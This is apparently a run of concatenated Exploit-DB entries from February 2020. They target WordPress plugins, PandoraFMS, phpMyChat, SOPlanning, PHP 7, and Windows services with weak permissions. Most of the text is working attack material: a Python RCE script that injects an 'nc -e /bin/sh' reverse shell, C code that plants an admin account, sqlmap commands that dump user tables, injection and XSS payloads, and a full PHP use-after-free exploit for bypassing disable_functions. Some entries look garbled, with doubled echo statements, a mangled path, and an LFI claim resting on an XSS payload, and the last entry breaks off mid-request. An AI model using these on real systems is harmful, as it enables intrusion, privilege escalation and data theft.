# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting # Author: mehran feizi # Category: webapps # Date: 2020-02-12 # vendor home page: https://wordpress.org/plugins/tutor/ =================================================================== Vulnerable page: /Quiz.php =================================================================== Vulnerable Source: 473: echo echo $topic_id; 447: $topic_id = sanitize_text_field($_POST['topic_id']); =================================================================== Exploit: localhost/wp-content/plugins/tutor/classes/Quiz.php $_POST('topic_id') = <script>alert('mehran')</script> =================================================================================

# Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation # Exploit Author: boku # Date: 2020-02-12 # Vendor Homepage: https://sourceforge.net/projects/tftp-server/ # Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download # Version: 1.66 # Tested On: Windows 10 (32-bit) # About: # "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, # Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available." # Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/ # Vulnerability Details: # On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions. # This allows a low-privilge, local attacker to escalate their permissions to Administrator; # by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable. # The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the # default installation. After the attacker has planted the malicious binary, the code will # be executed with System priviledges on the next boot of the windows device. See PoC below for details. ## Service Information (there is also an Unquoted Service Path) C:\>sc qc TFTPServer SERVICE_NAME: TFTPServer TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Open TFTP Single Port Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem ## Insecure Folder Permission C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C ## Insecure File/Service Permission C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) ## Local Privilege Escalation Proof of Concept #0. Download & install Open TFTP Server v1.66 #1. Create low privileged user & change to the user C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full" User name lowPrivUser Local Group Memberships *Users Global Group memberships *None C:\>whoami mycomputer\lowprivuser #2. Move the Service EXE to a new name C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe 1 file(s) moved. #3. Create malicious binary on kali linux 1) Download dependencies root@kali# apt install gcc-mingw-w64-i686 wine64 -y 2) Add Admin User C Code root@kali# cat addAdmin.c #include<windows.h> int main(void){ system("net user hacker mypassword /add"); system("net localgroup Administrators hacker /add"); WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0); return 0; } 3) Compile Code root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe #4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host #5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\ 1 file(s) moved. C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe" 02/12/2020 05:59 PM 288,659 OpenTFTPServerSP.exe 02/12/2020 06:38 PM 221,560 ~OpenTFTPServerSP.exe #6. Reboot the Computer #7. Look at that new Admin C:\Users\lowPrivUser>net users hacker | findstr "Local name active" User name hacker Account active Yes Local Group Memberships *Administrators *Users C:\Users\lowPrivUser>net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator boku hacker

# Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure # Author: mehran feizi # Category: webapps # Date: 2020-02-12 # vendor home page: https://wordpress.org/plugins/wordfence/ ============================================================================== Vulnerable Source: 5662: readfile readfile($localFile); 5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file'])); ================================================================================= Exploit: localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD] =================================================================================

# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution # Date: 2020-02-12 # Exploit Author: Engin Demirbilek # Vendor homepage: http://pandorafms.org/ # Version: 7.0 # Software link: https://pandorafms.org/features/free-download-monitoring-software/ # Tested on: CentOS # CVE: CVE-2020-8947 #!/bin/python ''' PANDORAFMS 7.0 Authenticated Remote Code Execution x4 This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS. incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port Author: Engin Demirbilek Github: github.com/EnginDemirbilek CVE: CVE-2020-8947 ''' import requests import sys if len(sys.argv) < 6: print "Usage: ./exploit.py http://url username password listenerIP listenerPort" exit() url = sys.argv[1] user = sys.argv[2] password = sys.argv[3] payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#' login = { 'nick':user, 'pass':password, 'login_button':'Login' } req = requests.Session() print "Sendin login request ..." login = req.post(url+"/pandora_console/index.php?login=1", data=login) payload = { 'date':"", 'time':"", 'period':"", 'interval_length':"", 'chart_type':"", 'max_aggregates':"1", 'address_resolution':"0", 'name':"", 'assign_group':"0", 'filter_type':"0", 'filter_id':"0", 'filter_selected':"0", 'ip_dst':payload, 'ip_src':"", 'dst_port':"", 'src_port':"", 'advanced_filter':"", 'aggregate':"dstip", 'router_ip':"", 'output':"bytes", 'draw_button':"Draw" } print "[+] Sendin exploit ..." exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={ 'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded'}) if exploit.status_code == 200: print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port." else: print "[-] Couldn't send the HTTP request, try again."

# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload # Author: mehran feizi # Category: webapps # Date: 2020-02-11 # vendor home page: https://wordpress.org/plugins/contact-form-7/ Vulnerable Source: 134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file)) 82: $file = $_FILES[$name] : null; 132: $new_file = path_join($uploads_dir, $filename); 122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 121: $uploads_dir = wpcf7_upload_tmp_dir(); 131: $filename = wp_unique_filename($uploads_dir, $filename); 122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 121: $uploads_dir = wpcf7_upload_tmp_dir(); 128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag); 126: $filename = wpcf7_antiscript_file_name ($filename); 125: $filename = wpcf7_canonicalize ($filename, 'as-is'); 124: $filename = $file['name']; 82: $file = $_FILES[$name] : null; 82: $file = $_FILES[$name] : null; 78: ⇓ function wpcf7_file_validation_filter($result, $tag) Exploit: <?php $shahab="file.jpg"; $ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip'=>"@$shahab")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); print "$result"; ?> Location File: http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg

# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion # Author : mehran feizi # Vendor : https://wordpress.org/plugins/ultimate-member/ # Category : Webapps # Date : 2020-02-11 # Vendor home page: https://wordpress.org/plugins/ultimate-member/ Vulnerable Page: /class-admin-upgrade.php Vulnerable Source: 354: if(empty($_POST['pack'])) else 356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php'; Exploit: localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php $_POST('pack')=<script>alert('xss')</script>

# Title: phpMyChat Plus 1.98 - 'pmc_username' SQL Injection # Date: 2020-02-13 # Exploit Author: J3rryBl4nks # Vendor Homepage: http://ciprianmp.com/latest/ # Software Link: https://sourceforge.net/projects/phpmychat/files/phpMyChat_Plus/ # Version MyChat Plus 1.98 # Tested on Windows 10/Kali Rolling # The phpMyChat Plus 1.98 application is vulnerable to Sql Injection # (Boolean based blind, Error-based, time-based blind) on the deluser.php page # through the pmc_user parameter. # POC code: # Capture the request through Burpsuite: POST /plus/deluser.php HTTP/1.1 Host: HOSTNAME User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://HOSTNAME/plus/deluser.php Content-Type: application/x-www-form-urlencoded Content-Length: 77 Connection: close Cookie: CookieLang=english; temp=temp; CookieUsername=testing; CookieRoom=Public%2BRoom%2B1; CookieRoomType=1; CookieStatus=r; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9 Upgrade-Insecure-Requests: 1 L=english&Link=&LIMIT=0&pmc_username=test&pmc_password=test&login_form=Log+In # Then use sqlmap to get the user tables: sqlmap -r deleteuserlogin.req --level=5 --risk=3 --dbms=mysql --tamper=unmagicquotes -D DBNAME --dump -T c_reg_users -p pmc_username Parameter: pmc_username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND 9736=(SELECT (CASE WHEN (9736=9736) THEN 9736 ELSE (SELECT 2847 UNION SELECT 9983) END))-- qEHq&pmc_password=test&login_form=Log In Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: L=english&Link=&LIMIT=0&pmc_username=test' OR (SELECT 7708 FROM(SELECT COUNT(*),CONCAT(0x7170627a71,(SELECT (ELT(7708=7708,1))),0x7162627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShDx&pmc_password=test&login_form=Log In Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND (SELECT 5588 FROM (SELECT(SLEEP(5)))wWnk)-- FHPh&pmc_password=test&login_form=Log In

# Exploit Title: HomeGuard Pro 9.3.1 - Insecure Folder Permissions # Exploit Author: boku # Date: 2020-02-13 # Vendor Homepage: https://veridium.net # Software Link: https://veridium.net/files_u/hg-pro/exe/HomeGuardPro-Setup.exe # Version 9.3.1 # Tested On: Windows 10 (32-bit) # HomeGuard Pro v9.3.1 - Unquoted Service Path + Insecure Folder/File/Service Permissions ## Service Information (Unquoted Service Path) C:\>wmic service get Name,PathName,StartMode,StartName | findstr /v "C:\Windows" | findstr /i /v """ Name PathName StartMode StartName HG52 AM VI C:\Program Files\HomeGuard Pro\vglset.exe Auto LocalSystem HG52 AMC C:\Program Files\HomeGuard Pro\vglsetw.exe Auto LocalSystem HG52 AM REM C:\Program Files\HomeGuard Pro\vglrem.exe Auto LocalSystem HG52 AM SRV C:\Program Files\HomeGuard Pro\vglserv.exe Auto LocalSystem ## Insecure Folder Permission C:\>icacls "C:\Program Files\HomeGuard Pro" | findstr /i "Users" C:\Program Files\HomeGuard Pro BUILTIN\Users:(F) ## Insecure File/Service Permission C:\>icacls "C:\Program Files\HomeGuard Pro\VGL*" | findstr /i "Users" C:\Program Files\HomeGuard Pro\vglrem.exe BUILTIN\Users:(I)(F) C:\Program Files\HomeGuard Pro\VGLSERV.EXE BUILTIN\Users:(I)(F) C:\Program Files\HomeGuard Pro\vglset.exe BUILTIN\Users:(I)(F) C:\Program Files\HomeGuard Pro\vglsetw.exe BUILTIN\Users:(I)(F)

# Exploit Title: EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-02-13 # Vendor Homepage: https://epson.com/support/easymp-network-projection-v2-86-for-windows # Software Link :https://ftp.epson.com/drivers/epson16189.exe # SEIKO EPSON CORP # Tested Version: 2.81 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Home x64 en # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "EPSON" | findstr /i /v """ EMP_NSWLSV EMP_NSWLSV C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe Auto C:\>sc qc "EMP_NSWLSV" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: EMP_NSWLSV TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : EMP_NSWLSV DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

# Exploit Title: SprintWork 2.3.1 - Local Privilege Escalation # Exploit Author: boku # Date: 2020-02-13 # Vendor Homepage: https://veridium.net # Software Link: https://veridium.net/files_u/spx/exe/SprintWork-Setup.exe # Version: 2.3.1 # Tested On: Windows 10 (32-bit) # Vulnerability Overview: # SprintWork v2.3.1 (x86) suffers from insecure file & service & folder permissions, unquoted service paths, # and a missing executable for one of the two Service it installs; to be ran as 'LocalSystem'. # This allows any local user to gain persistent code-execution as 'LocalSystem'. # Both the 32bit & 64bit build of SprintWork v2.3.1 create the services 'SP52 AMC' & 'SprintWork TM VI', with the "StartMode" set to 'Auto', to be ran as 'LocalSystem'; these services will ran every time the computer starts. The 'SP52 AMC' Service is set to use the 'nvlsimw.exe' file. On the 32bit version, the 'nvlsimw.exe' file is never created. This, in combination with its other vulnerabilities, results in persistent code-execution for any local user as 'LocalSystem'. # See Proof of Concept below for full details. # About: # "SprintWork Distraction Blocker -- Block Social Networks and Games, Track Time Spent on Websites and Programs, Maximize Productivity # + Block or time restrict social networks, online games or any website # - Block web distractions including social media, addictive gaming websites, video streaming websites or any website wasting your time. # + Block or time restrict games and programs # - Usage of non-work related applications can be blocked or limited to certain times of day, days of week or restricted to a total amount of time per day. # + Detailed activity monitoring and reporting # - Records time spent actively using programs, total run time of each program and start and end times of usage sessions as well as details of visited websites including time and total duration of visits. # + Selective user monitoring and blocking. # - Can exclude certain computer users from blocking rules and monitoring of activity. Useful for shared and family computers. # + Wildcard support # - Block websites that have certain words in their addresses or block an entire domain or only a specific sub-domain. # + Multiple website blocking lists. # - Block or set time restrictions collectively for groups of websites. # + Cannot be bypassed, deleted or disabled. # - Works with all browsers and Internet clients and cannot be forcefully stopped, disabled or uninstalled unless the lock time you've chosen expires and only after you enter your password." # - https://veridium.net/sprintwork/ ## Service Information (there is also an Unquoted Service Path) C:\>wmic service get name,pathname,startmode,StartName | findstr /v "C:\Windows" | findstr /i /c:Sprintwork SP52 AMC C:\Program Files\SprintWork\nvlsimw.exe Auto LocalSystem SprintWork TM VI C:\Program Files\SprintWork\nvlsim.exe Auto LocalSystem ## Missing Executable file 'nvlsimw.exe' for the 'SP52 AMC' service C:\>dir "C:\Program Files\SprintWork\" | findstr /i /c:"exe" 11/23/2019 10:20 PM 1,345,536 NVLSIM.EXE 12/25/2019 02:47 PM 1,202,688 qcden.exe 12/25/2019 02:47 PM 14,436,864 SprintWork.exe 11/23/2019 10:20 PM 1,557,504 txew.exe ## Insecure Folder Permission C:\>icacls "C:\Program Files\SprintWork" C:\Program Files\SprintWork BUILTIN\Users:(F) BUILTIN\Users:(OI)(CI)(IO)(F) ## Insecure File/Service Permission C:\>icacls "C:\Program Files\SprintWork\NVLSIM.EXE" C:\Program Files\SprintWork\NVLSIM.EXE BUILTIN\Users:(I)(F) ## Local Privilege Escalation Proof of Concept #0. Download & install SprintWork v2.3.1 (x86) on Windows 10 32bit Operating System #1. Create low privileged user C:\Windows\system32>net user lowpriv password /add #2. Change to lowpriv User C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full" User name lowPrivUser Local Group Memberships *Users Global Group memberships *None C:\>whoami mycomputer\lowprivuser #3. Create malicious binary on Kali Linux 3.1) Download dependencies root@kali# apt install gcc-mingw-w64-i686 wine64 -y 3.2) Create Add Admin User C Code root@kali# cat addAdmin.c #include<windows.h> int main(void){ system("net user adminpriv mypassword /add"); system("net localgroup Administrators adminpriv /add"); return 0; } 3.3) Compile Code root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o nvlsimw.exe #4. Transfer created 'nvlsimw.exe' to the Windows Host #5. Move the created 'nvlsimw.exe' binary to the 'C:\Program Files\SprintWorks\' Directory C:\Users\lowpriv>move nvlsimw.exe "C:\Program Files\SprintWork\" 1 file(s) moved. C:\Users\lowpriv>dir "C:\Program Files\SprintWork\" | findstr /i /c:nvlsim 11/23/2019 10:20 PM 1,345,536 NVLSIM.EXE 02/13/2020 06:07 PM 288,469 nvlsimw.exe #6. Verify localgroup 'Administrators' members C:\Users\lowpriv>net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator boku #6. Reboot the Computer C:\Users\lowpriv>shutdown /r /t 0 #7. Verify user 'adminpriv' was created & added to the localgroup 'Administrators' C:\>net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator adminpriv boku C:\>net user adminpriv | findstr /C:"User name" /C:active /C:Password /C:Group User name adminpriv Account active Yes Password last set ?2/?13/?2020 6:18:03 PM Password expires Never Password changeable ?2/?13/?2020 6:18:03 PM Password required Yes Local Group Memberships *Administrators *Users Global Group memberships *None

# PoC for the SWAPGS attack ([CVE-2019-1125](https://nvd.nist.gov/vuln/detail/CVE-2019-1125)) This holds the sources for the SWAPGS attack PoC publicly shown at Black Hat USA, 2019. ## Contents * leakgsbkva - variant 1 (look for random values in kernel memory; limited to PE kernel image header) * leakgsbkvat - variant 2 (extract random values from kernel memory; limited to PE kernel image header) * whitepaper * Black Hat USA 2019 presentation ## Prerequisites 1. Visual Studio 2015 2. Unpatched Windows x64 (7 or newer) ## Authors * Andrei Vlad LUȚAȘ * Dan Horea LUȚAȘ ## Additional resources [Video Recording of presentation at Black Hat USA, 2019](https://www.youtube.com/watch?v=uBPry7jcfBE) Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48071.zip

<?php # PHP 7.0-7.4 disable_functions bypass PoC (*nix only) # # Bug: https://bugs.php.net/bug.php?id=76047 # debug_backtrace() returns a reference to a variable # that has been destroyed, causing a UAF vulnerability. # # This exploit should work on all PHP 7.0-7.4 versions # released as of 30/01/2020. # # Author: https://github.com/mm0r1 pwn("uname -a"); function pwn($cmd) { global $abc, $helper, $backtrace; class Vuln { public $a; public function __destruct() { global $backtrace; unset($this->a); $backtrace = (new Exception)->getTrace(); # ;) if(!isset($backtrace[1]['args'])) { # PHP >= 7.4 $backtrace = debug_backtrace(); } } } class Helper { public $a, $b, $c, $d; } function str2ptr(&$str, $p = 0, $s = 8) { $address = 0; for($j = $s-1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p+$j]); } return $address; } function ptr2str($ptr, $m = 8) { $out = ""; for ($i=0; $i < $m; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } function write(&$str, $p, $v, $n = 8) { $i = 0; for($i = 0; $i < $n; $i++) { $str[$p + $i] = chr($v & 0xff); $v >>= 8; } } function leak($addr, $p = 0, $s = 8) { global $abc, $helper; write($abc, 0x68, $addr + $p - 0x10); $leak = strlen($helper->a); if($s != 8) { $leak %= 2 << ($s * 8) - 1; } return $leak; } function parse_elf($base) { $e_type = leak($base, 0x10, 2); $e_phoff = leak($base, 0x20); $e_phentsize = leak($base, 0x36, 2); $e_phnum = leak($base, 0x38, 2); for($i = 0; $i < $e_phnum; $i++) { $header = $base + $e_phoff + $i * $e_phentsize; $p_type = leak($header, 0, 4); $p_flags = leak($header, 4, 4); $p_vaddr = leak($header, 0x10); $p_memsz = leak($header, 0x28); if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write # handle pie $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr; $data_size = $p_memsz; } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec $text_size = $p_memsz; } } if(!$data_addr || !$text_size || !$data_size) return false; return [$data_addr, $text_size, $data_size]; } function get_basic_funcs($base, $elf) { list($data_addr, $text_size, $data_size) = $elf; for($i = 0; $i < $data_size / 8; $i++) { $leak = leak($data_addr, $i * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'constant' constant check if($deref != 0x746e6174736e6f63) continue; } else continue; $leak = leak($data_addr, ($i + 4) * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'bin2hex' constant check if($deref != 0x786568326e6962) continue; } else continue; return $data_addr + $i * 8; } } function get_binary_base($binary_leak) { $base = 0; $start = $binary_leak & 0xfffffffffffff000; for($i = 0; $i < 0x1000; $i++) { $addr = $start - 0x1000 * $i; $leak = leak($addr, 0, 7); if($leak == 0x10102464c457f) { # ELF header return $addr; } } } function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = leak($addr); $f_name = leak($f_entry, 0, 6); if($f_name == 0x6d6574737973) { # system return leak($addr + 8); } $addr += 0x20; } while($f_entry != 0); return false; } function trigger_uaf($arg) { # str_shuffle prevents opcache string interning $arg = str_shuffle(str_repeat('A', 79)); $vuln = new Vuln(); $vuln->a = $arg; } if(stristr(PHP_OS, 'WIN')) { die('This PoC is for *nix systems only.'); } $n_alloc = 10; # increase this value if UAF fails $contiguous = []; for($i = 0; $i < $n_alloc; $i++) $contiguous[] = str_shuffle(str_repeat('A', 79)); trigger_uaf('x'); $abc = $backtrace[1]['args'][0]; $helper = new Helper; $helper->b = function ($x) { }; if(strlen($abc) == 79 || strlen($abc) == 0) { die("UAF failed"); } # leaks $closure_handlers = str2ptr($abc, 0); $php_heap = str2ptr($abc, 0x58); $abc_addr = $php_heap - 0xc8; # fake value write($abc, 0x60, 2); write($abc, 0x70, 6); # fake reference write($abc, 0x10, $abc_addr + 0x60); write($abc, 0x18, 0xa); $closure_obj = str2ptr($abc, 0x20); $binary_leak = leak($closure_handlers, 8); if(!($base = get_binary_base($binary_leak))) { die("Couldn't determine binary base address"); } if(!($elf = parse_elf($base))) { die("Couldn't parse ELF header"); } if(!($basic_funcs = get_basic_funcs($base, $elf))) { die("Couldn't get basic_functions address"); } if(!($zif_system = get_system($basic_funcs))) { die("Couldn't get zif_system address"); } # fake closure object $fake_obj_offset = 0xd0; for($i = 0; $i < 0x110; $i += 8) { write($abc, $fake_obj_offset + $i, leak($closure_obj, $i)); } # pwn write($abc, 0x20, $abc_addr + $fake_obj_offset); write($abc, 0xd0 + 0x38, 1, 4); # internal func type write($abc, 0xd0 + 0x68, $zif_system); # internal func handler ($helper->b)($cmd); exit(); }

# Exploit Title: SOPlanning 1.45 - 'by' SQL Injection # Date: 2020-02-14 # Exploit Author: J3rryBl4nks # Vendor Homepage: https://www.soplanning.org/en/ # Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/ # Version 1.45 # Tested on Windows 10/Kali Rolling # The SOPlanning application is vulnerable to SQL Injection in the OrderBy clause of the sort on the Projects page: # POC: # The SOPlanning 1.45 application is vulnerable to SQL Injection which can be leveraged into getting the information for the users table. # Capture the request in Burpsuite: GET /soplanning/www/projets.php?order=nom_createur&by=ASC HTTP/1.1 Host: HOSTNAME User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://HOST/soplanning/www/projets.php?order=charge&by=ASC Connection: close Cookie: xposMois=0; dateDebut=14/02/2020; dateFin=14/04/2020; xposMoisWin=0; xposJoursWin=0; xposJours=0; yposMoisWin=0; yposMois=0; yposJoursWin=0; yposJours=0; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9; soplanningplanning_=pnljrmetd5cse4d8dm1f09fn0u; baseLigne=users; baseColonne=jours; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%5D Upgrade-Insecure-Requests: 1 # Feed the request into SQLMap: sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump Then you will be able to see the information for the users in the database: root@kali:~/SOPlanning# sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump ___ __H__ ___ ___[(]_____ ___ ___ {1.4.1.2#dev} |_ -| . [,] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:13:27 /2020-02-14/ [11:13:27] [INFO] parsing HTTP request from 'projects.req' [11:13:27] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: by (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause Payload: order=nom_createur&by=ASC,(SELECT (CASE WHEN (6871=6871) THEN 1 ELSE 6871*(SELECT 6871 FROM INFORMATION_SCHEMA.PLUGINS) END)) Type: time-based blind Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: order=nom_createur&by=ASC PROCEDURE ANALYSE(EXTRACTVALUE(9535,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x77464654))))),1) --- Because it's time based it will take a while to retrieve the user details, but you will retrieve password hashes.

# Exploit Title: HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-02-14 # Vendor Homepage:https://www8.hp.com/mx/es/home.html # Software Link:ftp://ftp.hp.com/pub/softpaq/sp70001-70500/sp70439.exe # HP Development Company, L.P. # Tested Version: 1.2.9.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Home x64 en # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "HP" | findstr /i /v """ HPWMISVC HPWMISVC C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe Auto C:\>sc qc HPWMISVC [SC] QueryServiceConfig SUCCESS SERVICE_NAME: HPWMISVC TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HPWMISVC DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\> # Exploit: # A successful attempt would require the local user to be able to insert their code in the system # root path undetected by the OS or other security applications where it could potentially be # executed during application startup or reboot. If successful, the local user's code would # execute with the elevated privileges of the application.

# Exploit Title: Wordpress Plugin Strong Testimonials 2.40.0 - Persistent Cross-Site Scripting # Date: 2020-01-23 # Vendor Homepage: https://strongtestimonials.com # Vendor Changelog: https://github.com/MachoThemes/strong-testimonials/blob/master/changelog.txt # Exploit Author: Jinson Varghese Behanan # Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-strong-testimonials-plugin/ # Author Homepage: https://www.jinsonvarghese.com # Version: 2.40.0 and below # CVE : CVE-2020-8549 # 1. Description # Strong Testimonials is a popular and easily customizable WordPress testimonial plugin with # over 90,000 active installations. In the client details section which is seen when adding # or editing a testimonial, the custom[client_name] and custom[company_name] parameters # were found to be vulnerable to stored cross-site scripting. All WordPress websites # using Strong Testimonials version 2.40.0 and below are affected. 2. Proof of Concept When the testimonial is added to a page on the site, the XSS payload passed in both of the above mentioned vulnerable parameters get executed. The payload in custom[client_name] also gets executed in the All Testimonials (/wp-admin/edit.php?post_type=wpm-testimonial) page. POST /wp-admin/post.php HTTP/1.1 Host: testing.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://testing.com/wp-admin/post.php?post=24879&action=edit Content-Type: application/x-www-form-urlencoded Content-Length: 1402 